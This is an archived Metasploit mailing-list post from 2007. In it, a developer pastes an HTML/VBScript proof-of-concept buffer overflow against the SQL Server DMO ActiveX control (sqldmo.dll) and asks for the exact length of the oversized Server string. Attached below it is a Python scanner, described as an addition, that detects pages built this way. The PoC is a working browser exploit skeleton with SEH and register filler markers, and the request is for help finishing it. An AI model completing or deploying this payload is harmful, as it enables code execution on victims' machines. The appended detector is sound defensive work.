[framework] Microsoft SQL Server Distributed Management Objects OLE DLL for
Manish Gupta
manish.gupta at ariosesoftware.com
Thu Sep 13 22:41:53 CDT 2007
Hi
I want to know the server string length of Microsoft SQL Server Distributed Management Objects OLE DLL which has been published on 7th of Sept. 2007.
Regards
Manish Gupta
Ariose Software
Noida (U.P)
Mbl:-+91-9891650667
_____
From: Manish Gupta [mailto:manish.gupta at ariosesoftware.com]
Sent: Thursday, September 13, 2007 6:05 PM
To: framework at metasploit.com
Subject: [framework] Microsoft SQL Server Distributed Management Objects OLE DLL for
Hi
I am working on the "Microsoft SQL Server Distributed Management Objects OLE DLL for SQL Enterprise Manager (sqldmo.dll) remote buffer overflow" vulnerability, whose exploit is:
<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer'></object>
<script language='vbscript'>
targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype = "Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )"
memberName = "Start"
progid = "SQLDMO.SQLServer"
argCount = 4
'edx = ecx
edx = "bb"
seh = "aa"
StartMode = True
' Server is the oversized argument passed to Start; the assignment is one logical line, split here with VBScript " _" continuation
Server = "http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\tes.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te@st\tes\test\test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx + _
         "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRRR\QQQQ\PP@PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCCC\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#$%\ttttt\ssss\rr@rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\fffff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
Login = "aaaaaaaa"
Password = "bbbbbbbb"
SQLServer.Start StartMode, Server, Login, Password
</script>
</html>
I am not able to find the Server string length, so please help me.
Regards
Manish Gupta
Ariose Software
Noida (U.P)
Mbl:-+91-9891650667
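A defender-side check for pages built like the PoC above, added here as an example (not part of the original post, and not Metasploit code): it flags HTML that instantiates the SQLDMO.SQLServer control by the CLSID shown in the PoC and then hands an oversized string argument to its Start method, resolving the VBScript literal-plus-variable concatenation the same way the PoC builds Server. The 256-character threshold, the sample page and the small VBScript evaluator are assumptions/constructed.

```python
import re

# CLSID of the SQLDMO.SQLServer control, taken from the PoC above.
SQLDMO_CLSID = "10020200-E260-11CF-AE68-00AA004A34D5"
LONG_ARG = 256  # assumed threshold: a real server name never gets near this

_OBJECT_RE = re.compile(r"<object[^>]*classid=['\"]clsid:([0-9a-f-]+)['\"]", re.I)
_SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
_ASSIGN_RE = re.compile(r"^[ \t]*(\w+)[ \t]*=[ \t]*(.+?)[ \t]*$", re.M)
_TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)')
_START_RE = re.compile(r"\.Start[ \t]+([^\n]+)")


def vb_expr_length(expr, env):
    """Length of the string a VBScript concatenation expression builds.
    Literals count their characters ("" inside a literal is one quote);
    identifiers are resolved through env (earlier assignments), else 0."""
    total = 0
    for lit, ident in _TOKEN_RE.findall(expr):
        total += env.get(ident, 0) if ident else len(lit.replace('""', '"'))
    return total


def scan_html(html):
    """Return [(argument, length)] for oversized arguments handed to .Start
    in a page that embeds the SQLDMO control; [] for anything else."""
    clsids = {m.group(1).upper() for m in _OBJECT_RE.finditer(html)}
    if SQLDMO_CLSID not in clsids:
        return []
    findings = []
    for script in _SCRIPT_RE.findall(html):
        script = re.sub(r"_[ \t]*\r?\n", " ", script)  # join ' _' continuations
        env = {}
        for name, rhs in _ASSIGN_RE.findall(script):
            env[name] = vb_expr_length(rhs, env)  # earlier names feed later ones
        for m in _START_RE.finditer(script):
            for arg in (a.strip() for a in m.group(1).split(",")):
                n = env.get(arg, 0)
                if n > LONG_ARG:
                    findings.append((arg, n))
    return findings


# Constructed sample page in the shape of the PoC: a 300-byte host part plus
# the seh/edx fillers concatenated into Server (7 + 300 + 2 + 6 + 2 = 317).
SAMPLE_HTML = (
    "<html><object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' "
    "id='SQLServer'></object>\n<script language='vbscript'>\n"
    'edx = "bb"\nseh = "aa"\n'
    'Server = "http://' + "A" * 300 + '" + seh + "CCDmmm" + _\n    edx\n'
    'Login = "user"\nSQLServer.Start True, Server, Login, "pw"\n</script></html>\n'
)

if __name__ == "__main__":
    print(scan_html(SAMPLE_HTML))  # [('Server', 317)]
```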